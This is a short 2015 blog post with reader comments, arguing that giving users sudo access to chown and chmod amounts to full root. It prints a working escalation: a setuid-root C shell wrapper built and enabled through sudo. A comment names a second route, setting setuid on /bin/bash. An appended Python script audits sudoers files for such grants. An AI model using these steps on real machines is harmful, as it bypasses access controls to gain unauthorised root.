Privilege Escalation – be slack and pay for it

My predecessor(s) had left a bunch of people at my workplace (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.

I had to demonstrate it. So I did:

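cat <<EOF > make-me-root.c
#include <unistd.h>
int main() {
    /* argv must be a NULL-terminated array; passing NULL is not portable */
    char *const argv[] = {"/bin/bash", NULL};
    setuid(0);
    execv(argv[0], argv);
    return 1; /* only reached if execv() fails */
}
EOF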

gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root

./make-me-root

Alright, demonstrated. Now it’s time for the raised eyebrows to follow.

And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.

Posted January 30, 2015 by malkodan in Linux
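
For the defensive side of the point made in the post, an added example (not the author's code) that scans sudoers text for rules granting chown or chmod, directly or through a Cmnd_Alias, so they can be reviewed. The sample policy and its user, group and alias names are constructed; the parser is an assumption-laden sketch that handles line continuations, one alias per line and runas/tag prefixes, and does not follow include files.

```python
import os
import re

RISKY = {"chown", "chmod"}  # the two commands the post shows are root-equivalent
PREFIX = re.compile(r"^(\([^)]*\)\s*)?([A-Z_]+:\s*)*")  # "(runas)" and "TAG:" prefixes

SAMPLE = r"""
# constructed sample policy, not taken from any real host
Defaults env_reset
Cmnd_Alias DATA_MGMT = /bin/chown, \
                       /bin/chmod
%data   ALL = (root) NOPASSWD: DATA_MGMT
backup  ALL = (root) /usr/bin/rsync, /usr/bin/chmod -R g+r /srv/data
deploy  ALL = (root) /usr/bin/systemctl restart app
"""

def logical_lines(text):
    """Join backslash continuations; drop blank lines and '#' lines."""
    joined = re.sub(r"\\\n\s*", " ", text)
    lines = (l.strip() for l in joined.splitlines())
    return [l for l in lines if l and not l.startswith("#")]

def commands(spec):
    """Yield the command path or alias name of each comma-separated item."""
    for item in re.split(r",(?![^()]*\))", spec):  # ignore commas inside "(a, b)"
        item = PREFIX.sub("", item.strip(), count=1)
        if item and not item.startswith("!"):      # negated entries grant nothing
            yield item.split()[0]

def audit(text):
    """Return (principal, command path) pairs for rules that grant chown/chmod."""
    lines = logical_lines(text)
    aliases = {}
    for line in lines:
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = list(commands(m.group(2)))
    def expand(name, depth=0):
        if name in aliases and depth < 5:          # depth guard against alias loops
            for sub in aliases[name]:
                yield from expand(sub, depth + 1)
        else:
            yield name
    findings = []
    for line in lines:
        if re.match(r"(Defaults|\w+_Alias)\b", line) or "=" not in line:
            continue                               # not a user specification
        who, spec = line.split()[0], line.split("=", 1)[1]
        findings += [(who, p) for c in commands(spec) for p in expand(c)
                     if os.path.basename(p) in RISKY]
    return findings
```

Running `audit()` over the real policy means feeding it the contents of /etc/sudoers and each file under /etc/sudoers.d, read with sufficient privileges.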

4 responses to “Privilege Escalation – be slack and pay for it”

  1. You are right, but there’s no need to compile something in order to get root access on a system where one has chown and chmod. I can think of at least 3 methods of exploiting sudo chmod and sudo chown in order to get root access… (found out about this blog just today, hence the late comment)

  2. Hi Paolo, thanks for the comment. Then please enlighten us.

  3. Probably the easiest would be to add setuid (using chmod) to /bin/bash.
